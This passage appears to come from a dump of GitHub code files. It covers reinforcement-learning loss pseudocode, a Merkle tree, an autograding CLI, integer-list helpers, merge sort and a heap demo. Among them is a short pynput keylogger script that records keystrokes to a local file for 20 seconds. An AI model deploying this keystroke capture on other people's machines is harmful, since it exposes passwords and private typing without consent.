used. If you pass an\n entire trajectory and zeros for bootstrap_value, this is just the Monte-Carlo\n return / TD(1) target.\n For lambda=0 these are one-step TD(0) targets.\n For inbetween values of lambda these are lambda-returns / TD(lambda) targets,\n except that traces are always cut off at the end of the chunk, since we can't\n see returns beyond then. If you pass an entire trajectory with zeros for\n bootstrap_value though, then they're plain TD(lambda) targets.\n lambda can also be a tensor of values in [0, 1], determining the mix of\n bootstrapping vs further accumulation of multistep returns at each timestep.\n This can be used to implement Retrace and other algorithms. See\n `sequence_ops.multistep_forward_view` for more info on this. Another way to\n think about the end-of-chunk cutoff is that lambda is always effectively zero\n on the timestep after the end of the chunk, since at the end of the chunk we\n rely entirely on bootstrapping and can't accumulate returns looking further\n into the future.\n The sequences in the tensors should be aligned such that an agent in a state\n with value `V` transitions into another state with value `V'`, receiving\n reward `r` and pcontinue `p`. Then `V`, `r` and `p` are all at the same index\n `i` in the corresponding tensors. 
`V'` is at index `i+1`, or in the\n `bootstrap_value` tensor if `i == T`.\n Subtracting `values` from these lambda-returns will yield estimates of the\n advantage function which can be used for both the policy gradient loss and\n the baseline value function loss in A3C / GAE.\n Args:\n rewards: 2-D Tensor with shape `[T, B]`.\n pcontinues: 2-D Tensor with shape `[T, B]`.\n values: 2-D Tensor containing estimates of the state values for timesteps\n 0 to `T-1`. Shape `[T, B]`.\n bootstrap_value: 1-D Tensor containing an estimate of the value of the\n final state at time `T`, used for bootstrapping the target n-step\n returns. Shape `[B]`.\n lambda_: an optional scalar or 2-D Tensor with shape `[T, B]`.\n name: Customises the name_scope for this op.\n Returns:\n 2-D Tensor with shape `[T, B]`\n \"\"\"\n values.get_shape().assert_has_rank(2)\n rewards.get_shape().assert_has_rank(2)\n pcontinues.get_shape().assert_has_rank(2)\n bootstrap_value.get_shape().assert_has_rank(1)\n scoped_values = [rewards, pcontinues, values, bootstrap_value, lambda_]\n with tf.name_scope(name, values=scoped_values):\n if lambda_ == 1:\n # This is actually equivalent to the branch below, just an optimisation\n # to avoid unnecessary work in this case:\n return sequence_ops.scan_discounted_sum(\n rewards,\n pcontinues,\n initial_value=bootstrap_value,\n reverse=True,\n back_prop=False,\n name=\"multistep_returns\")\n else:\n v_tp1 = tf.concat(\n axis=0, values=[values[1:, :],\n tf.expand_dims(bootstrap_value, 0)])\n # `back_prop=False` prevents gradients flowing into values and\n # bootstrap_value, which is what you want when using the bootstrapped\n # lambda-returns in an update as targets for values.\n return sequence_ops.multistep_forward_view(\n rewards,\n pcontinues,\n v_tp1,\n lambda_,\n back_prop=False,\n name=\"generalized_lambda_returns\")\n\n\ndef vtrace_advantages(clipped_rhos, rewards, discounts, values, bootstrap_value):\n \"\"\"Computes v-trace return advantages.\n\n Refer to the following for a similar function:\n https://github.com/deepmind/trfl/blob/40884d4bb39f99e4a642acdbe26113914ad0acec/trfl/vtrace_ops.py#L154\n \"\"\"\n\n\ndef vtrace_from_importance_weights(\n log_rhos, discounts, rewards, values, bootstrap_value,\n clip_rho_threshold=1.0, clip_pg_rho_threshold=1.0,\n name='vtrace_from_importance_weights'):\n r\"\"\"V-trace from log importance weights.\n Calculates V-trace actor critic targets as described in\n \"IMPALA: Scalable Distributed Deep-RL with\n Importance Weighted Actor-Learner Architectures\"\n by Espeholt, Soyer, Munos et al.\n In the notation used throughout documentation and comments, T refers to the\n time dimension ranging from 0 to T-1. B refers to the batch size and\n NUM_ACTIONS refers to the number of actions. This code also supports the\n case where all tensors have the same number of additional dimensions, e.g.,\n `rewards` is `[T, B, C]`, `values` is `[T, B, C]`, `bootstrap_value`\n is `[B, C]`.\n Args:\n log_rhos: A float32 tensor of shape `[T, B, NUM_ACTIONS]` representing the\n log importance sampling weights, i.e.\n log(target_policy(a) / behaviour_policy(a)). V-trace performs operations\n on rhos in log-space for numerical stability.\n discounts: A float32 tensor of shape `[T, B]` with discounts encountered\n when following the behaviour policy.\n rewards: A float32 tensor of shape `[T, B]` containing rewards generated by\n following the behaviour policy.\n values: A float32 tensor of shape `[T, B]` with the value function estimates\n wrt. 
the target policy.\n bootstrap_value: A float32 of shape `[B]` with the value function estimate\n at time T.\n clip_rho_threshold: A scalar float32 tensor with the clipping threshold for\n importance weights (rho) when calculating the baseline targets (vs).\n rho^bar in the paper. If None, no clipping is applied.\n clip_pg_rho_threshold: A scalar float32 tensor with the clipping threshold\n on rho_s in \\rho_s \\delta log \\pi(a|x) (r + \\gamma v_{s+1} - V(x_s)). If\n None, no clipping is applied.\n name: The name scope that all V-trace operations will be created in.\n Returns:\n A VTraceReturns namedtuple (vs, pg_advantages) where:\n vs: A float32 tensor of shape `[T, B]`. Can be used as target to\n train a baseline (V(x_t) - vs_t)^2.\n pg_advantages: A float32 tensor of shape `[T, B]`. Can be used as the\n advantage in the calculation of policy gradients.\n \"\"\"\n log_rhos = tf.convert_to_tensor(log_rhos, dtype=tf.float32)\n discounts = tf.convert_to_tensor(discounts, dtype=tf.float32)\n rewards = tf.convert_to_tensor(rewards, dtype=tf.float32)\n values = tf.convert_to_tensor(values, dtype=tf.float32)\n bootstrap_value = tf.convert_to_tensor(bootstrap_value, dtype=tf.float32)\n if clip_rho_threshold is not None:\n clip_rho_threshold = tf.convert_to_tensor(clip_rho_threshold,\n dtype=tf.float32)\n if clip_pg_rho_threshold is not None:\n clip_pg_rho_threshold = tf.convert_to_tensor(clip_pg_rho_threshold,\n dtype=tf.float32)\n\n # Make sure tensor ranks are consistent.\n rho_rank = log_rhos.shape.ndims # Usually 2.\n values.shape.assert_has_rank(rho_rank)\n bootstrap_value.shape.assert_has_rank(rho_rank - 1)\n discounts.shape.assert_has_rank(rho_rank)\n rewards.shape.assert_has_rank(rho_rank)\n if clip_rho_threshold is not None:\n clip_rho_threshold.shape.assert_has_rank(0)\n if clip_pg_rho_threshold is not None:\n clip_pg_rho_threshold.shape.assert_has_rank(0)\n\n with tf.name_scope(name, values=[\n log_rhos, discounts, rewards, values, bootstrap_value]):\n rhos = tf.exp(log_rhos)\n if clip_rho_threshold is not None:\n clipped_rhos = tf.minimum(clip_rho_threshold, rhos, name='clipped_rhos')\n else:\n clipped_rhos = rhos\n\n cs = tf.minimum(1.0, rhos, name='cs')\n # Append bootstrapped value to get [v1, ..., v_t+1]\n values_t_plus_1 = tf.concat(\n [values[1:], tf.expand_dims(bootstrap_value, 0)], axis=0)\n deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)\n\n # Note that all sequences are reversed, computation starts from the back.\n sequences = (\n tf.reverse(discounts, axis=[0]),\n tf.reverse(cs, axis=[0]),\n tf.reverse(deltas, axis=[0]),\n )\n # V-trace vs are calculated through a scan from the back to the beginning\n # of the given trajectory.\n\n def scanfunc(acc, sequence_item):\n discount_t, c_t, delta_t = sequence_item\n return delta_t + discount_t * c_t * acc\n\n initial_values = tf.zeros_like(bootstrap_value)\n vs_minus_v_xs = tf.scan(\n fn=scanfunc,\n elems=sequences,\n initializer=initial_values,\n parallel_iterations=1,\n back_prop=False,\n name='scan')\n # Reverse the results back to original order.\n vs_minus_v_xs = tf.reverse(vs_minus_v_xs, [0], name='vs_minus_v_xs')\n\n # Add V(x_s) to get v_s.\n vs = tf.add(vs_minus_v_xs, values, name='vs')\n\n # Advantage for policy gradient.\n vs_t_plus_1 = tf.concat([\n vs[1:], tf.expand_dims(bootstrap_value, 0)], axis=0)\n if clip_pg_rho_threshold is not None:\n clipped_pg_rhos = tf.minimum(clip_pg_rho_threshold, rhos,\n name='clipped_pg_rhos')\n else:\n clipped_pg_rhos = rhos\n pg_advantages = (\n 
clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values))\n\n # Make sure no gradients backpropagated through the returned values.\n return VTraceReturns(vs=tf.stop_gradient(vs),\n pg_advantages=tf.stop_gradient(pg_advantages))\n\n\ndef td_lambda_loss(baselines, rewards, trajectories):\n discounts = ~trajectories.is_final[:-1]\n returns = lambda_returns(baselines[1:], rewards, discounts, lambdas=0.8)\n returns = stop_gradient(returns)\n return 0.5 * np.mean(np.square(returns - baselines[:-1]))\n\n\ndef policy_gradient_loss(logits, actions, advantages, mask):\n \"\"\"Helper function for computing policy gradient loss for UPGO and v-trace.\"\"\"\n action_log_prob = log_prob(actions, logits)\n advantages = stop_gradient(advantages)\n return mask * advantages * action_log_prob\n\n\ndef compute_unclipped_logrho(behavior_logits, target_logits, actions):\n \"\"\"Helper function for compute_importance_weights.\"\"\"\n return log_prob(actions, target_logits) - log_prob(actions, behavior_logits)\n\n\ndef compute_importance_weights(behavior_logits, target_logits, actions):\n \"\"\"Computes clipped importance weights.\"\"\"\n logrho = compute_over_actions(compute_unclipped_logrho, behavior_logits,\n target_logits, actions)\n return np.minimum(1., np.exp(logrho))\n\n\ndef vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n action_fields):\n \"\"\"Computes v-trace policy gradient loss. Helper for split_vtrace_pg_loss.\"\"\"\n # Remove last timestep from trajectories and baselines.\n trajectories = Trajectory(*tuple(t[:-1] for t in trajectories))\n rewards = rewards[:-1]\n values = baselines[:-1]\n\n # Filter for only the relevant actions/logits/masks.\n target_logits = filter_by(action_fields, target_logits)\n behavior_logits = filter_by(action_fields, trajectories.behavior_logits)\n actions = filter_by(action_fields, trajectories.actions)\n masks = filter_by(action_fields, trajectories.masks)\n\n # Compute and return the v-trace policy gradient loss for the relevant subset\n # of logits.\n clipped_rhos = compute_importance_weights(behavior_logits, target_logits,\n actions)\n weighted_advantage = vtrace_advantages(clipped_rhos, rewards,\n trajectories.discounts, values,\n baselines[-1])\n weighted_advantage = [weighted_advantage] * len(target_logits)\n return compute_over_actions(policy_gradient_loss, target_logits,\n actions, weighted_advantage, masks)\n\n\ndef split_vtrace_pg_loss(target_logits, baselines, rewards, trajectories):\n \"\"\"Computes the split v-trace policy gradient loss.\n\n We compute the policy loss (and therefore update, via autodiff) separately for\n the action_type, delay, and arguments. Each of these component losses is\n weighted equally.\n \"\"\"\n loss = 0.\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'action_type')\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'delay')\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'arguments')\n return loss\n\n\ndef upgo_returns(values, rewards, discounts, bootstrap):\n \"\"\"Computes the UPGO return targets.\n\n Args:\n values: Estimated state values. Shape [T, B].\n rewards: Rewards received moving to the next state. Shape [T, B].\n discounts: If the step is NOT final. Shape [T, B].\n bootstrap: Bootstrap values. Shape [B].\n Returns:\n UPGO return targets. Shape [T, B].\n \"\"\"\n next_values = np.concatenate(\n [values[1:], np.expand_dims(bootstrap, axis=0)], axis=0)\n 
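# (Editor note, added for clarity) lambda_returns below is fed the *next*-step\n # values, so each UPGO target starts from r_t + discount_t * V_{t+1} and keeps\n # extending along the trajectory only while that one-step estimate does not\n # fall below the state value.\n 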
# Upgo can be viewed as a lambda return! The trace continues (i.e. lambda = 1.0)\n # if r_t + V_tp1 > V_t.\n lambdas = (rewards + discounts * next_values) >= values\n # Shift lambdas left one slot, such that V_t matches indices with lambda_tp1.\n lambdas = np.concatenate([lambdas[1:], np.ones_like(lambdas[-1:])], axis=0)\n return lambda_returns(next_values, rewards, discounts, lambdas)\n\n\ndef split_upgo_loss(target_logits, baselines, trajectories):\n \"\"\"Computes split UPGO policy gradient loss.\n\n See split_vtrace_pg_loss docstring for details on split updates.\n See Methods for details on UPGO.\n \"\"\"\n # Remove last timestep from trajectories and baselines.\n trajectories = Trajectory(*tuple(t[:-1] for t in trajectories))\n values = baselines[:-1]\n returns = upgo_returns(values, trajectories.rewards, trajectories.discounts,\n baselines[-1])\n\n # Compute the UPGO loss for each action subset.\n loss = 0.\n for action_fields in ['action_type', 'delay', 'arguments']:\n split_target_logits = filter_by(action_fields, target_logits)\n behavior_logits = filter_by(action_fields, trajectories.behavior_logits)\n actions = filter_by(action_fields, trajectories.actions)\n masks = filter_by(action_fields, trajectories.masks)\n\n importance_weights = compute_importance_weights(behavior_logits,\n split_target_logits,\n actions)\n weighted_advantage = (returns - values) * importance_weights\n weighted_advantage = [weighted_advantage] * len(split_target_logits)\n loss += compute_over_actions(policy_gradient_loss, split_target_logits,\n actions, weighted_advantage, masks)\n return loss\n\n\ndef compute_pseudoreward(trajectories, reward_name):\n \"\"\"Computes the relevant pseudoreward from trajectories.\n\n See Methods and detailed_architecture.txt for details.\n \"\"\"\n\n\ndef loss_function(agent, trajectories):\n \"\"\"Computes the loss of trajectories given weights.\"\"\"\n # All ALL_CAPS variables are constants.\n target_logits, baselines = agent.unroll(trajectories)\n\n loss_actor_critic = 0.\n # We use a number of actor-critic losses - one for the winloss baseline, which\n # outputs the probability of victory, and one for each pseudo-reward\n # associated with following the human strategy statistic z.\n # See the paper methods and detailed_architecture.txt for more details.\n for baseline, costs_and_rewards in zip(baselines,\n BASELINE_COSTS_AND_REWARDS):\n pg_cost, baseline_cost, reward_name = costs_and_rewards\n rewards = compute_pseudoreward(trajectories, reward_name)\n loss_actor_critic += (\n baseline_cost * td_lambda_loss(baseline, rewards, trajectories))\n loss_actor_critic += (\n pg_cost\n * split_vtrace_pg_loss(target_logits, baseline, rewards, trajectories))\n\n loss_upgo = UPGO_WEIGHT * split_upgo_loss(\n target_logits, baselines.winloss_baseline, trajectories)\n loss_he = human_policy_kl_loss(trajectories, KL_COST, ACTION_TYPE_KL_COST)\n\n loss_ent = entropy_loss(trajectories.behavior_logits, trajectories.masks)\n loss_ent = loss_ent * ENT_WEIGHT\n\n return loss_actor_critic + loss_upgo + loss_he + loss_ent\n","repo_name":"liuruoze/mini-AlphaStar","sub_path":"res/pseudcode/pseudocode/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","stars":267,"dataset":"github-code","pt":"61"} +{"seq_id":"14198104108","text":"from hashlib import sha256\n\n\nclass Node:\n def __init__(self, left_node, hash_value, right_node):\n self.left = left_node\n self.hash = hash_value\n self.right = right_node\n\n\nclass MerkleTree:\n @staticmethod\n def hash(input_str):\n return 
sha256(str(input_str).encode('utf-8')).hexdigest()\n\n @staticmethod\n def generate_tree(datablocks):\n child_nodes = []\n for datablock in datablocks:\n child_nodes.append(Node(None, MerkleTree.hash(datablock), None))\n return MerkleTree.build_tree(child_nodes)\n\n @staticmethod\n def build_tree(child_nodes):\n parents = []\n while len(child_nodes) != 1:\n index = 0\n length = len(child_nodes)\n while index < length:\n left_child = child_nodes[index]\n right_child = None\n # Add duplicate if tree nodes are odd\n if (index + 1) < length:\n right_child = child_nodes[index + 1]\n else:\n right_child = Node(None, left_child.hash, None)\n parent_hash = MerkleTree.hash(left_child.hash + right_child.hash)\n parents.append(Node(left_child, parent_hash, right_child))\n index += 2\n child_nodes = parents\n parents = []\n return child_nodes[0]\n\n @staticmethod\n def print_tree(root):\n \"\"\"list contents of the tree nodes level by level\n from root to leaves in BFS (level) order\"\"\"\n if not root:\n return\n if not root.left and not root.right:\n print(root.hash)\n return\n q = [root, None]\n while len(q) > 0:\n node = q.pop(0)\n if node:\n print(node.hash)\n else:\n print('')\n if len(q) > 0:\n q.append(None)\n if node and node.left:\n q.append(node.left)\n if node and node.right:\n q.append(node.right)\n \n\ndef test_print():\n tests = [\n ['hello', 'there', '123', 'world'],\n ['1', '2', '3'],\n [1, 2, 3],\n ['a', 'b', 'c', 'd', 'e', 'f', 'g'],\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']]\n for idx, test_datablock in enumerate(tests):\n print(f'Test {idx + 1}: {test_datablock}')\n root = MerkleTree.generate_tree(test_datablock)\n MerkleTree.print_tree(root)\n print('--------------------------------')\n\n\ndef test_comparison():\n def check_integrity(root1, root2):\n
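 # (editor note, added) comparing only the root hashes suffices: any modified\n # leaf changes every hash on its path up to the root.\n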
 print('Data is genuine.' if root1.hash == root2.hash else 'Data is altered!')\n \n # Reference and comparison data\n original_data = ['this', 'data', 'is', 'intact']\n original_tree = MerkleTree.generate_tree(original_data)\n modified_data = ['this', 'data', 'is', 'intact']\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n # Modify the comparison data\n modified_data[3] = 'MODIFIED!'\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n # Revert modifications\n modified_data[3] = 'intact'\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n\ndef main():\n # test_print()\n test_comparison()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"upperdim/merkle-hash-tree","sub_path":"merkle_hash_tree.py","file_name":"merkle_hash_tree.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9417191248","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom autograde.cli.audit import cmd_audit\nfrom autograde.cli.build import cmd_build\nfrom autograde.cli.patch import cmd_patch\nfrom autograde.cli.report import cmd_report\nfrom autograde.cli.summary import cmd_summary\nfrom autograde.cli.test import cmd_tst\nfrom autograde.cli.version import cmd_version\nfrom autograde.util import logger, loglevel\n\n\ndef cli(args=None):\n # environment variables\n verbosity = int(os.environ.get('AG_VERBOSITY', 0))\n container_backend = os.environ.get('AG_BACKEND', None)\n container_tag = os.environ.get('AG_TAG', 'autograde')\n\n # command line arguments\n parser = argparse.ArgumentParser(\n description='utility for grading jupyter notebooks',\n epilog='autograde on github: https://github.com/cssh-rwth/autograde',\n prog='autograde',\n )\n\n # global flags\n parser.add_argument('-v', '--verbose', action='count', default=verbosity,\n help='verbosity level')\n parser.add_argument('--backend', type=str, default=container_backend,\n choices=['docker', 'rootless-docker', 'podman'], metavar='',\n help=f'container backend to use, default is {container_backend}')\n parser.add_argument('--tag', type=str, default=container_tag, metavar='',\n help=f'container tag, default: \"{container_tag}\"')\n parser.set_defaults(func=cmd_version)\n\n subparsers = parser.add_subparsers(help='sub command help')\n\n # build sub command\n bld_parser = subparsers.add_parser('build', help=cmd_build.__doc__)\n bld_parser.add_argument('-r', '--requirements', type=Path, default=None,\n help='additional requirements to install')\n bld_parser.add_argument('-q', '--quiet', action='store_true', help='mute output')\n bld_parser.set_defaults(func=cmd_build)\n\n # test sub command\n tst_parser = subparsers.add_parser('test', help=cmd_tst.__doc__)\n tst_parser.add_argument('test', type=str, help='autograde test script')\n tst_parser.add_argument('notebook', type=str, help='the jupyter notebook(s) to be tested')\n tst_parser.add_argument('-t', '--target', type=str, metavar='', help='where to store results')\n tst_parser.add_argument('-c', '--context', type=str, metavar='', help='context directory')\n tst_parser.set_defaults(func=cmd_tst)\n\n # patch sub command\n ptc_parser = subparsers.add_parser('patch', help=cmd_patch.__doc__)\n ptc_parser.add_argument('result', type=str, help='result archive(s) to be patched')\n 
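# Example invocation (editor note; archive names are hypothetical):\n # autograde patch graded-results.zip corrected-results.zip\n 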
ptc_parser.add_argument('patch', type=str, help='result archive(s) for patching')\n ptc_parser.set_defaults(func=cmd_patch)\n\n # audit sub command\n adt_parser = subparsers.add_parser('audit', help=cmd_audit.__doc__)\n adt_parser.add_argument('result', type=str, help='result archive(s) to audit')\n adt_parser.add_argument('-b', '--bind', type=str, default='127.0.0.1', help='host to bind to')\n adt_parser.add_argument('-p', '--port', type=int, default=5000, help='port')\n adt_parser.set_defaults(func=cmd_audit)\n\n # report sub command\n rpt_parser = subparsers.add_parser('report', help=cmd_report.__doc__)\n rpt_parser.add_argument('result', type=str, help='result archive(s) for creating the report')\n rpt_parser.set_defaults(func=cmd_report)\n\n # summary sub command\n sum_parser = subparsers.add_parser('summary', help=cmd_summary.__doc__)\n sum_parser.add_argument('result', type=str, help='result archives to summarize')\n sum_parser.set_defaults(func=cmd_summary)\n\n # version sub command\n vrs_parser = subparsers.add_parser('version', help=cmd_version.__doc__)\n vrs_parser.set_defaults(func=cmd_version)\n\n args = parser.parse_args(args)\n\n logger.setLevel(loglevel(args.verbose))\n logger.debug(f'default encoding: {sys.getdefaultencoding()}')\n logger.debug(f'args: {args}')\n\n return args.func(args)\n\n\nif __name__ == '__main__':\n sys.exit(cli())\n","repo_name":"ouseful-backup/autograde","sub_path":"autograde/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"4261010079","text":"from pynput.keyboard import Listener\nimport time\n\nstart_time = 0\n\ndef log_keystroke(key):\n key = str(key).replace(\"'\", \"\")\n\n if key == 'Key.space':\n key = ' '\n if key == 'Key.shift_r':\n key = ''\n if key == 'Key.enter':\n key = ' '\n\n\n with open(\"data/keylog.txt\", 'a') as f:\n f.write(key)\n\ndef on_release(key):\n if start_time + 20 < time.time():\n return False\n\nwith Listener(on_press=log_keystroke, on_release=on_release) as l:\n start_time = time.time()\n print(start_time)\n l.join()","repo_name":"ug-31/advanced-keylogger","sub_path":"keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761328494","text":"'''utilities for lists of integers'''\n\ndef str_intgen(x,end=None):\n \"\"\"\n Convert a string such as 2,5-8,10\n Into a generator of integers (2,5,6,7,8,10)\n Also works with :-notation, eg 2,5:9:2,10 becomes (2,5,7,10)\n Note: no sorting or removal of duplicates; sorted(set(...)) will do that\n \"\"\"\n if x:\n for part in x.split(','):\n if ':' in part:\n abc = part.split(':')\n intabc = [int(_) for _ in abc]\n for n in range(*intabc):\n yield n\n elif '-' in part:\n a, b = part.split('-')\n if not b and end is not None:\n b=end\n a, b = int(a), int(b)\n for n in range(a, b + 1):\n yield n\n else:\n n = int(part)\n yield n\n\ndef string_to_intlist(x,end=None):\n \"\"\"\n Convert a string such as 2,5-8,10\n Into a list of integers [2,5,6,7,8,10]\n Also works with :-notation, eg 2,5:9:2,10 becomes [2,5,7,10]\n Note: no sorting or removal of duplicates; sorted(set(...)) will do that\n \"\"\"\n return list(str_intgen(x,end=end))\n\n\ndef string_to_intlist_old(x,end=None):\n \"\"\"\n Deprecated -- see string_to_intlist\n \"\"\"\n result = []\n for part in x.split(','):\n if ':' in part:\n abc = part.split(':')\n 
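# (editor note) a:b:c follows range() semantics, e.g. 5:9:2 -> 5, 7, matching\n # the docstring examples above.\n 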
intabc = [int(_) for _ in abc]\n result.extend(range(*intabc))\n #print \"part=\",part,\"intabc=\",intabc,\"result=\",result #debug\n elif '-' in part:\n a, b = part.split('-')\n if not b and end is not None:\n b=end\n a, b = int(a), int(b)\n result.extend(range(a, b + 1))\n elif \"\" == part:\n pass\n else:\n a = int(part)\n result.append(a)\n return result\n\ndef format_intlist(nlist,width=79,intro=\"\"):\n '''write out a list of integers neatly over several lines,\n separated by commas, and lined up nicely in columns. eg:\n nlist = range(25), width=50, intro=\"Sites:\" produces\n Sites: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,\n 20, 21, 22, 23, 24\n '''\n maxwid = max(len(str(n)) for n in nlist)\n fmt = f\"%{maxwid}d\"\n nperline = (width - len(intro)) // (maxwid+2)\n nlines = 1 + len(nlist) // nperline\n lines=[]\n for nl in range(nlines):\n introstr = intro if nl==0 else \" \"*len(intro)\n nbot = nl*nperline\n ntop = min([nl*nperline + nperline,len(nlist)])\n nslice = slice(nbot, ntop)\n if ntop>nbot:\n lines.append(introstr + \", \".join(fmt % n for n in nlist[nslice]))\n return lines\n\ndef intlist_to_string(nlist,sort=False):\n '''inverse of string_to_intlist,\n eg, [1,2,3,6,7,9,10,11] --> \"1-3,6,7,9-11\"\n '''\n if len(nlist)==0:\n return \"\"\n if sort:\n ## sort and also remove duplicates\n nlist = sorted(set(nlist))\n slist=[]\n nlo = nhi = nlist[0]\n for n in list(nlist[1:]) + [None]:\n if n == nhi+1:\n nhi = n\n else:\n if nlo==nhi:\n slist.append( str(nlo) )\n elif nhi==nlo+1:\n slist.append( str(nlo) + \",\" + str(nhi) )\n elif nhi>nlo+1:\n slist.append( str(nlo) + \"-\" + str(nhi) )\n nlo = nhi = n\n\n return \",\".join(slist)\n\n\n\ndef write_numbers_vertically(nlist,plusone=0,leadingzero=' '):\n '''\n write numbers vertically so one number per column;\n eg, input: nlist = [80, 96, 175, 515]\n output three lines:\n ..15\n 8971\n 0655\n '''\n\n if nlist is None or len(nlist)==0:\n return []\n\n lines = []\n rlist = []\n nlist = [n+plusone for n in nlist]\n while max(nlist)>0:\n rlist.append( [str(n%10) for n in nlist] )\n nlist = [n//10 for n in nlist]\n rlist = rlist[::-1]\n\n ## Replace leading 0's with space\n for j in range(len(rlist[0])):\n for k in range(len(rlist)):\n if rlist[k][j] == '0':\n rlist[k][j] = leadingzero\n else:\n break\n\n for r in rlist:\n lines.append(\"\".join(r))\n return lines\n\ndef intlist_to_rangelist(intlist):\n '''\n input: 1,2,3,7,8,9,58,59,60,61\n output: (1,4),(7,10),(58,62)\n '''\n intlist = sorted(intlist) #make sure list is sorted\n rangelist = []\n nprev=lo=hi=None\n for n in intlist + [None]:\n if n is None:\n rangelist.append( (lo,hi) )\n break\n if lo is None:\n lo = nprev = n\n hi = n+1\n continue\n if n > nprev+1:\n rangelist.append( (lo,hi) )\n lo = n\n nprev = n\n hi = n+1\n return rangelist\n\n\n\nif __name__ == \"__main__\":\n\n for s in [\"2,5-8,10\",\"2,5-8,10-12\"]:\n nlist = string_to_intlist(s)\n print(s,nlist)\n rlist = intlist_to_rangelist(nlist)\n print(s,rlist)\n s=\"2,5-8,10-\"\n print(s,string_to_intlist(s,end=20))\n\n print(\"Empty:\",string_to_intlist_old(\"\"))\n print(\"None:\",string_to_intlist(None))\n print(\"Empty:\",string_to_intlist(\"\"))\n print(\"Zero:\",string_to_intlist(\"0\"))\n\n nlist = [80,90,145,2,3567,3456,124]\n lines = write_numbers_vertically(nlist)\n print(nlist,\":\")\n 
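# (editor example, added for illustration) the inverse also round-trips:\n # intlist_to_string([1, 2, 3, 6, 7, 9, 10, 11]) -> 1-3,6,7,9-11\n 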
print(\"\\n\".join(lines))\n","repo_name":"jt-lanl/cov-voc","sub_path":"intlist.py","file_name":"intlist.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27813568694","text":"'''\nJoao Marcos\nMerge Sort implementation\n'''\n\n\ndef merge(left, right):\n \"\"\"Merge sort merging function.\"\"\"\n\n left_index, right_index = 0, 0\n result = []\n while left_index < len(left) and right_index < len(right):\n if left[left_index] < right[right_index]:\n result.append(left[left_index])\n left_index += 1\n else:\n result.append(right[right_index])\n right_index += 1\n\n result += left[left_index:]\n result += right[right_index:]\n return result\n\n\ndef merge_sort(array):\n if len(array) <= 1: # base case\n return array\n\n # divide array in half and merge sort recursively\n half = len(array) // 2\n left = merge_sort(array[:half])\n right = merge_sort(array[half:])\n\n return merge(left, right)\n\nmerge_sort([3,4,5,1,2,8,3,7,6])\n","repo_name":"arademaker/ED-2017-2","sub_path":"src/Mergesort-JoaoMarcos.py","file_name":"Mergesort-JoaoMarcos.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74681979074","text":"# This program is for Representing Priority Queues with a Heap (heappop).\n\nfrom heapq import heappush\nfrom heapq import heappop\n\nprint(\"\\n\\t\\t********PROGRAMMED BY:********\")\nprint(\"\\t\\t***BEVERLY ANN L. RODRIGUEZ***\\n\")\n\n# The first element on a heap always has the smallest (min-heap) or the highest (max-heap) \n# value, depending on how you define the condition for the mentioned relationship. \nvegetables = []\nheappush(vegetables, \"Squash\")\nheappush(vegetables, \"Letuce\")\nheappush(vegetables, \"Eggplant\")\nheappush(vegetables, \"Cucumber\")\nheappush(vegetables, \"Celery\")\n\n\n# When you pop an element from a heap, you’ll always get the first one, \n# while the remaining elements might shuffle a little bit\nprint(heappop(vegetables))\nprint(\"These are the remaining elements: \\n\\t\",vegetables)\n\n\n","repo_name":"BeverlyRodriguez/PythonStacksQueuesPriorities","sub_path":"PriorityHeappop.py","file_name":"PriorityHeappop.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21864994026","text":"from hypothesis import assume\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import composite, lists, sampled_from\n\nfrom .symbols import symbol_items\n\nfrom .forms import form_items\n\nfrom .separators import separator_strings\n\nfrom custom.label.tagged_literals import label\nfrom custom.verify.tagged_literals import verify, verify_with_metadata\nfrom custom.parameters import metadata_max\n\nfrom .util import make_form_with_metadata_str_builder\n\nmarker = '#'\n\n# XXX: could also have stuff before and after delimiters\ndef build_tagged_literal_str(tagged_literal_item):\n form_item = tagged_literal_item[\"inputs\"]\n form_str = form_item[\"to_str\"](form_item)\n #\n seps = tagged_literal_item[\"separators\"]\n #\n tag_item = tagged_literal_item[\"tag\"]\n tag_str = tag_item[\"to_str\"](tag_item)\n #\n # XXX: consider again later\n #return marker + seps[0] + tag_str + seps[1] + form_str\n return marker + tag_str + \" \" + form_str\n\n@composite\ndef tag_items(draw):\n # XXX: symbol with metadata should be possible too...\n # may need to 
